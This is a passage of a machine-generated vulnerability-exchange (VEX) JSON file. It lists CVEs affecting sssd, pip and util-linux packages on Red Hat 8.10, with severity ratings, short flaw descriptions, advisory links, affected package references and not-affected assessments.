        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        825
      ],
      "description": "A flaw was found in sssd. When authenticating with a YubiKey, the SSSD PAM responder can crash due to a use-after-free vulnerability, where a memory pointer is incorrectly handled. A local attacker could exploit this flaw by manipulating smartcard or YubiKey contents, leading to a denial of service that disrupts authentication. This vulnerability also presents a potential for privilege escalation, although it is difficult to exploit.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-12610"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-12610"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2490288"
        },
        {
          "url": "https://github.com/SSSD/sssd/issues/8796"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12610"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-12610"
        }
      ],
      "published": "2026-06-30T10:16:34+00:00",
      "updated": "2026-06-30T20:08:54+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "1.3.1-39.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/pam@1.3.1-39.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-13346",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:L/I:H/A:L"
        }
      ],
      "cwes": [
        36
      ],
      "description": "pip would incorrectly handle doubly-encoded package URLs from indexes allowing for files to be installed to arbitrary locations on disk even when installing wheels.\n\n\n\n\nThis vulnerability requires downloading or installing a package from a malicious package index to succeed, malicious packages alone are not able to exploit this vulnerability. Note that this vulnerability only materially impacts users running `pip download` with the `--only-binary` option as installing source distributions from an untrusted index is already an unsafe operation that executes code during install time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13346"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/29/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13346"
        },
        {
          "url": "https://github.com/pypa/pip/pull/14110"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/L2BNQGGVQCEV7DROOORQ7WFKKFF2OOQX/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13346"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13346"
        }
      ],
      "published": "2026-07-29T19:16:44+00:00",
      "updated": "2026-07-30T16:43:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "9.0.3-24.el8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python-pip@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-pip-wheel@9.0.3-24.el8?arch=noarch&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-13595",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H"
        }
      ],
      "cwes": [
        416
      ],
      "description": "A flaw was found in the libblkid library of util-linux. During nested partition probing, the BSD, Minix, Solaris x86, and UnixWare partition probers cache a raw pointer to a parent partition entry in a dynamically allocated array. When subsequent partition additions cause the array to be reallocated, this pointer becomes stale, leading to a heap use-after-free read. An attacker who can present a crafted block device image (for example, via USB insertion or a loop-mounted disk image) can trigger this flaw without user interaction, as libblkid is invoked automatically by udev/udisks as root on block-device hot-plug events. This could lead to limited information disclosure or denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-13595"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:26573"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-13595"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2494101"
        },
        {
          "url": "https://github.com/util-linux/util-linux/commit/c0186f14fbdb02f64c8e0ba701ce727ea764ff4c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-13595"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-13595"
        }
      ],
      "published": "2026-06-29T09:16:28+00:00",
      "updated": "2026-07-08T03:37:21+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "2.32.1-48.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libfdisk@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libmount@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libsmartcols@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libuuid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/util-linux@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libblkid@2.32.1-48.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
